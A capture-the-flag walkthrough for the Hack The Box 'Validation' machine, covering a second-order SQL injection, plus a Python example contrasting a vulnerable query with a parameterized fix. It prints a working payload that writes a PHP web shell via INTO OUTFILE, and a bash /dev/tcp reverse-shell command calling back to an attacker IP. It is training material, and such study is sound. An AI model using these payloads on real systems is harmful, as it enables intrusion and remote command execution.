HTB Validation writeup

In this tutorial we will get root access on the Validation machine from Hack The Box.

TLDR

  1. Run a port scan.
  2. Find the web app on port 80.
  3. Find a 2nd order SQLi in the country param.
  4. Upload a web shell, as the DB user has FILE permission.
  5. Create a reverse shell.
  6. Find the root password in the /var/www/html/config.php file.

Walkthrough

First we run a port scan with nmap -p1-65535 -v 10.10.11.116:

If we open http://10.10.11.116:80 we will see a registration page:

When you register a new user you are redirected to the account.php page with a list of all users. When you intercept the request there are 2 params being sent: username and country:

The country parameter is vulnerable to 2nd order SQLi. If you pass a value with a trailing single quote (country') you will see an error on the account.php page:

This means that the malicious country value is saved into the DB as-is and later used unsafely in another SQL query.
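
The store-then-reuse pattern described above, as an added example that is not code from the target application. It uses Python's sqlite3 as a stand-in for the machine's PHP app and database; the table, function names and sample values are hypothetical and constructed for illustration. The vulnerable second query sits beside its parameterized fix:

```python
import sqlite3

def make_db():
    # Constructed schema standing in for the app's user table (hypothetical names).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE registration (username TEXT, country TEXT)")
    return db

def register(db, username, country):
    # Step 1: the INSERT is parameterized, so the value is stored verbatim,
    # quote characters included. Nothing breaks yet.
    db.execute("INSERT INTO registration VALUES (?, ?)", (username, country))

def stored_country(db, username):
    row = db.execute("SELECT country FROM registration WHERE username = ?",
                     (username,)).fetchone()
    return row[0]

def list_users_vulnerable(db, username):
    # Step 2 (the bug): the value read back from the DB is treated as trusted
    # and concatenated into a second query.
    country = stored_country(db, username)
    sql = "SELECT username FROM registration WHERE country = '" + country + "'"
    return [r[0] for r in db.execute(sql)]

def list_users_fixed(db, username):
    # Fix: stored data is still untrusted input; bind it as a parameter.
    country = stored_country(db, username)
    sql = "SELECT username FROM registration WHERE country = ?"
    return [r[0] for r in db.execute(sql, (country,))]

def demo():
    db = make_db()
    register(db, "alice", "Aruba")
    register(db, "test1", "Aruba'")  # constructed: trailing quote
    register(db, "test2", "Aruba' UNION SELECT 'injected")  # constructed
    out = {}
    try:
        list_users_vulnerable(db, "test1")
        out["quote"] = "no error"
    except sqlite3.OperationalError:
        out["quote"] = "sql error"  # the error the account page surfaces
    out["union_vulnerable"] = sorted(list_users_vulnerable(db, "test2"))
    out["union_fixed"] = list_users_fixed(db, "test2")
    out["quote_fixed"] = list_users_fixed(db, "test1")
    return out

if __name__ == "__main__":
    print(demo())
```

Escaping or parameterizing only the INSERT is not enough: every later query that reads the stored value must bind it as well.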

Now we can upload a web shell through the SQLi, as our user has FILE permission in the DB. Use the following payload to create the web shell:

username=test3&country=Aruba' UNION SELECT "<?php SYSTEM($_REQUEST['cmd']) ?>" INTO OUTFILE "/var/www/html/myshell.php"-- -

Now if you open http://10.10.11.116/myshell.php?cmd=id you should see:

Now we should establish a reverse shell. Start an nc listener on your local machine:

Establish a reverse session using the web shell: http://10.10.11.116/myshell.php?cmd=bash+-c+%27bash+-i+%3E%26+/dev/tcp/10.10.14.60/9090+0%3E%261%27

You should get a connection back:

In /var/www/html you can find a config.php file containing a password. This password can also be used for the root user:
